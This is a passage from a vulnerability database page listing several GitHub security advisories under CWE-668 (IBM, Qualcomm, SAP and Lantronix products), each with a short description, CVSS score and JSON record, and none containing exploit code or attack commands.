    }
  ],
  "summary": "@andrea9293/mcp-documentation-server: Web UI API binds to all interfaces without authentication by default"
}

GHSA-6F7X-QJ2V-8RH2

Vulnerability from github – Published: 2023-10-16 00:30 – Updated: 2024-04-04 08:38
VLAI
Details

IBM Security Verify Governance 10.0, Identity Manager could allow a local privileged user to obtain sensitive information from source code. IBM X-Force ID: 257769.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-35013"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-540",
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-10-16T00:15:10Z",
    "severity": "MODERATE"
  },
  "details": "IBM Security Verify Governance 10.0, Identity Manager could allow a local privileged user to obtain sensitive information from source code.  IBM X-Force ID:  257769.",
  "id": "GHSA-6f7x-qj2v-8rh2",
  "modified": "2024-04-04T08:38:55Z",
  "published": "2023-10-16T00:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35013"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/257769"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7050358"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6FRX-XQ63-R4JC

Vulnerability from github – Published: 2022-06-15 00:00 – Updated: 2022-06-24 00:00
VLAI
Details

RPM secure Stream can access any secure resource due to improper SMMU configuration in Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-30346"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-14T10:15:00Z",
    "severity": "MODERATE"
  },
  "details": "RPM secure Stream can access any secure resource due to improper SMMU configuration in Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking",
  "id": "GHSA-6frx-xq63-r4jc",
  "modified": "2022-06-24T00:00:34Z",
  "published": "2022-06-15T00:00:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30346"
    },
    {
      "type": "WEB",
      "url": "https://www.qualcomm.com/company/product-security/bulletins/april-2022-bulletin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6FVF-FHP3-G8CX

Vulnerability from github – Published: 2022-05-24 19:17 – Updated: 2022-05-24 19:17
VLAI
Details

SAP BusinessObjects Analysis (edition for OLAP) - versions 420, 430, allows an attacker to exploit certain application endpoints to read sensitive data. These endpoints are normally exposed over the network and successful exploitation could lead to exposure of some system specific data like its version.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-40497"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-12T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "SAP BusinessObjects Analysis (edition for OLAP) - versions 420, 430, allows an attacker to exploit certain application endpoints to read sensitive data. These endpoints are normally exposed over the network and successful exploitation could lead to exposure of some system specific data like its version.",
  "id": "GHSA-6fvf-fhp3-g8cx",
  "modified": "2022-05-24T19:17:18Z",
  "published": "2022-05-24T19:17:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40497"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.support.sap.com/#/notes/3098917"
    },
    {
      "type": "WEB",
      "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6FW5-96CF-75P5

Vulnerability from github – Published: 2021-12-23 00:01 – Updated: 2022-04-20 00:02
VLAI
Details

A local file inclusion vulnerability exists in the Web Manager Applications and FsBrowse functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted series of HTTP requests can lead to local file inclusion. An attacker can make a series of authenticated HTTP requests to trigger this vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-21878"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-22T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A local file inclusion vulnerability exists in the Web Manager Applications and FsBrowse functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted series of HTTP requests can lead to local file inclusion. An attacker can make a series of authenticated HTTP requests to trigger this vulnerability.",
  "id": "GHSA-6fw5-96cf-75p5",
  "modified": "2022-04-20T00:02:02Z",
  "published": "2021-12-23T00:01:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21878"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1322"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.